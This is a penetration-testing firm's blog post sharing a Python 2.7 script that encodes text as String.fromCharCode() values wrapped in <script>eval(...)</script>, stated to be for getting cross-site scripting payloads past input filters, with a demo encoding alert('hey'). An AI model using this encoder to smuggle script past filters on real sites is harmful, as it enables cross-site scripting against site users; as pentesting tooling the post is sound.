London: 020 0200 8142

Python Unicode Converter

This is a quick script I wrote for converting to Unicode and back when using string.fromCharCode() to circumvent filters in Cross Site Scripting attacks.

Usage: -auh

Simple tool to convert from ASCII to Unicode and back for use with String.fromCharCode().

arguments:
-h, –help Show this help message and exit.

-a ASCII_STRING Enter the ASCII string for conversion contained within ” “. Any ” in the string itself must be escaped with a \ or simply use ‘ instead.

-u UNICODE_CHARS Enter the Unicode values for conversion contained within ” “. Script will take comma separated values as well as just spaced.

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/usr/bin/python2.7
 
import argparse
import sys
import re
 
def CharCode(text):
    print "<script>eval(String.fromCharCode(",
    for count, letter in enumerate(text): #setting up a for loop, so we can iterate through the string and get the unicode value for each char. enumerate() gets the count of the character and assigns it to count. We can then use these to add commas after each value.
	    Unicode_values = ord(letter) #ord is the built in function that gets the unicode value for an ascii character
	    sys.stdout.write(str(Unicode_values))
	    if count < len(text) -1: #basically saying here, if we are at any value but the last, add a comma after it.len is an inbuilt function that gets the length of a string'''
                sys.stdout.write(', ')
	    else:   
		 sys.stdout.write('))</script>')
		 sys.stdout.write('\r\n') #adding a new line at the end so it looks tidier in the bash shell
 
def CharDecode(unicode_chars):
    ASCII_chars = ""
    for code in unicode_chars.split(' '): #.split() breaks up a string based on the separator you specify (in this case a space).
        if "," in code: 
                code = code.replace(',', '') #here we remove any commas from input
        ASCII_chars += chr(int(code)) #chr is the built in function that converts from unicode to ascii
    print "ASCII string is:", ASCII_chars
 
if __name__ == "__main__":
 
    parser = argparse.ArgumentParser(description='Simple tool to convert from ASCII to Unicode and back for use with String.fromCharCode().', usage = '-auh') #argparse let's us take input via flags
    parser.add_argument("-a", dest = "ascii_string", action = "store", help = '''Enter the ASCII string for conversion contained within " ". Any " in the string itself must be escaped with a \ or simply use ' instead.''', required = False)
    parser.add_argument("-u", dest = "unicode_chars", action = "store", help = '''Enter the Unicode values for conversion contained within " ". Script will take comma separated values as well as just spaced.''', required = False)
 
    args = parser.parse_args() #this makes args the method of the argparser class, so we can access any usersupplied variables with args.variablename'''
 
    if not (args.ascii_string or args.unicode_chars): #checking to make sure some input is supplied
        parser.error("Input is required! Usage: -a ASCII string, -u Unicode values, -h help.")
    if args.ascii_string: 
        CharCode(args.ascii_string)
    if args.unicode_chars:
        CharDecode(args.unicode_chars)

Example usage:

# ./charcode.py -a “alert(‘hey’)”
&lt;script&gt;eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 104, 101, 121, 39, 41))&lt;/script&gt;

We are Perspective Risk

  • Information security is crucial to every aspect of your business – operational efficiency, profitability, business continuity, customer confidence, brand loyalty, protection against fraud and meeting regulatory requirements.

    Our penetration testing, pen testing, pen tests and cyber security testing has proven time and time again to be an effective security assessment of business IT infrastructure.

    Perspective Risk provides in-depth security assessments, risk management and compliance solutions to help you keep your confidential information safe and your critical systems secure. We’re innovative, flexible and supportive, helping you through any information security issues to deliver real business benefits and excellent value.

  • Call Me

    Pop your details in below and we’ll be in touch soon!

    • This field is for validation purposes and should be left unchanged.

    ×
    Get Quote
    • This field is for validation purposes and should be left unchanged.
    ×